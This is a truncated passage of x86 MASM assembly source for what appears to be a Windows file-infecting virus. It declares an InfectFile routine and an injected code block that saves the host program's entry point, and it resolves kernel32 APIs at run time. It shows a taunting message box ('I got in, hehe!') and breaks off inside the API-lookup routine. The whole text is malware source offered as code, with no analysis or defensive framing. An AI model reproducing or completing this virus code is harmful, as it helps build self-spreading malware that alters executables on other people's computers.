.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib

;##########
InfectFile    proto    :dword
GetApiA         proto    :DWORD,:DWORD
;#########
.code

;###############插入代码############################
VStart:
appBase         dd ?
k32Base         dd ?
HostEntry    dd    ?
;#############################################
sGetModuleHandle       db "GetModuleHandleA",0
sGetProcAddress        db "GetProcAddress",0
sExitProcess           db "ExitProcess",0
sLoadLibrary           db "LoadLibraryA",0
sMessageBoxA           db "MessageBoxA",0

aGetModuleHandle                dd 0
aGetProcAddress                 dd 0
aExitProcess                    dd 0
aLoadLibrary                    dd 0
aMessageBoxA                    dd 0

u32                     db "User32.dll",0
k32                     db "Kernel32.dll",0

sztit                   db "by 无理取闹",0
szMsg                 db "我进来了，呵呵！",0
szBuffer    db    256 dup    (?)

lpApiAddrs      label   near
              dd      offset sGetModuleHandle
              dd      offset sGetProcAddress
              dd      offset sExitProcess
              dd      offset sLoadLibrary
              dd      0
;################获取api#########################################################
GetApiA         proc    Base:DWORD,sApi:DWORD
    local    @dwStringLength
    local    @return
    pushad
    ;#############计算api的长度#########################
    mov    edi,sApi
    mov    ecx,-1
    xor    al,al
    cld
    repnz    scasb
    mov    ecx,edi
    sub